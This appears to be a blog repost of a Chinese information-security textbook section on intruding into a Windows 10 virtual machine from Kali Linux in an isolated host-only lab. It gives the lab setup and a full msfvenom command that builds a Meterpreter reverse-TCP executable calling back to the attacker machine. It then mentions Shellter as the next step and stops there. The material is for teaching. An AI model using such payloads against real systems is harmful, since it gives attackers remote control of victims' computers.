信息安全技术实用教程-第4版---张同光---ISBN-9787121423031---4.4实例——入侵Windows10

信息安全技术实用教程-第4版---张同光---ISBN-9787121423031---4.4实例——入侵Windows10

https://www.cnblogs.com/ztguang/p/12828764.html

主  编:     张同光

ISBN号: 978-7-121-42303-1             9787121423031
出版日期:   2021-11-20
出版社:     电子工业出版社

页码:  定价:¥69.80元


4.4  实例——入侵Windows 10

1.实验环境

实验环境如4.1所示使用2个虚拟机(Windows10_1703_x86_enKaliLinux和宿主机(Windows 10),2个虚拟机的网络连接方式选择“仅主机(Host-Only)网络”宿主机和2个虚拟机的IP地址、三个系统之间的网络连通性4.2所示两个虚拟机分别Kali Linux 2020Windows 10Windows 10 1703作为被渗透的目标机,Kali Linux作为攻击机。

 

 

 4.1  实验环境

 

 4.2  三个系统的IP地址及其之间的网络连通性

2入侵过程

1步:执行msfvenom命令

4.3所示Kali Linux终端窗口中执行如下命令

msfvenom -p windows/meterpreter/reverse_tcp -a x86 platform windows -f exe LHOST=192.168.56.101 LPORT=4444 -o /root/kali2win10.exe

上面msfvenom命令生成32Windows可执行文件kali2win10.exe,该文件实现反向TCP连接必须指定为.exe类型,并且必须定义本地主机(LHOST)和本地端口(LPORT)。该实例中LHOST是攻击机的IP地址,LPORT是一个端口,一旦目标机受到攻击,它就会监听目标机的连接。

 

 4.3  执行msfvenom命令

2步:下载并运行Shellter

posted @ 2021-11-27 14:52  张同光  阅读(135)  评论(0编辑  收藏  举报